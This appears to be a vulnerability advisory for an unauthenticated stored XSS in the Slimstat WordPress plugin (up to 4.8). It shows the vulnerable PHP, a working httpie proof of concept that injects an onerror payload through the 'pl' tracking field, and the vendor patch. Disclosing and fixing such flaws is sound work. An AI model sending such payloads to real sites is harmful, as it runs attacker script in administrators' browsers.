Skip to content

Slimstat <= 4.8 - Unauthenticated Stored XSS

Summary

Description Details
Name Slimstat
Summary Insufficient sanitization in displaying browser plugins data, allowing evil JS execution by admin
Affected application wp-slimstat
Affected revision <= 4.8
Vendor update available Yes
CVE
Ids CWE-79
CVSSv3.0 Base Score 6.1
CVSS vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Public Exploit available Yes
Exploit verified Yes
Authentication Required No

Vulnerable Code

<?php
## admin/view/right-now.php
191                         foreach($results[$i]['plugins'] as $a_plugin){
192                                 $a_plugin = trim($a_plugin);
193                                 $plugins .= "<a class='slimstat-filter-link inline-icon' href='" . wp_slimstat_reports::fs_url( 'plugins contains ' . $a_p    lugin ) . "'><img class='slimstat-tooltip-trigger' src='$plugin_url/images/plugins/$a_plugin.png' width='16' height='16' title='" . __( $a_plugin, 'wp-sli    mstat' ) . "'></a> ";
194                         }
195                 }

Exploit :

cid=$( http http://slimstatwp.vulnsite.xxyy/  User-Agent:"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Falkon/3.1.0 Chrome/69.0.3497.128 Safari/537.36"   | grep SlimStatParams | awk -F'"' ' {print $20 }'  )

http -v --form http://slimstatwp.vulnsite.xxyy/wp-admin/admin-ajax.php action=slimtrack  op=add  id=$cid  ref=  res=  sw=1280  sh=800  bw=1280  bh=702  sl=1390  pp=532  pl="plugin'onerror='alert(document.domain)" User-Agent:"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Falkon/3.1.0 Chrome/69.0.3497.128 Safari/537.36"

Exploit Methodology

The attacker will have to do the following to exploit this vulnerability:-

  • Attacker can easily upload evil javascript and wait for administrator to view Access Log of Slimstats

Security Patch

diff --git a/wp-content/plugins/wp-slimstat/admin/view/right-now.php b/wp-content/plugins/wp-slimstat/admin/view/right-now.php
index 620d638..69c89a5 100644
--- a/wp-content/plugins/wp-slimstat/admin/view/right-now.php
+++ b/wp-content/plugins/wp-slimstat/admin/view/right-now.php
@@ -189,7 +189,7 @@ for ( $i=0; $i < $count_page_results; $i++ ) {
                if (!empty($results[$i]['plugins'])){
                        $results[$i]['plugins'] = explode(',', $results[$i]['plugins']);
                        foreach($results[$i]['plugins'] as $a_plugin){
-                               $a_plugin = trim($a_plugin);
+                               $a_plugin = str_replace( array( "'", '"' ), '', trim( $a_plugin ) );
                                $plugins .= "<a class='slimstat-filter-link inline-icon' href='" . wp_slimstat_reports::fs_url( 'plugins contains ' . $a_plugin ) . "'><img class='slimstat-tooltip-trigger' src='$plugin_url/images/plugins/$a_plugin.png' width='16' height='16' title='" . __( $a_plugin, 'wp-slimstat' ) . "'></a> ";
                        }
                }

References

Sucuri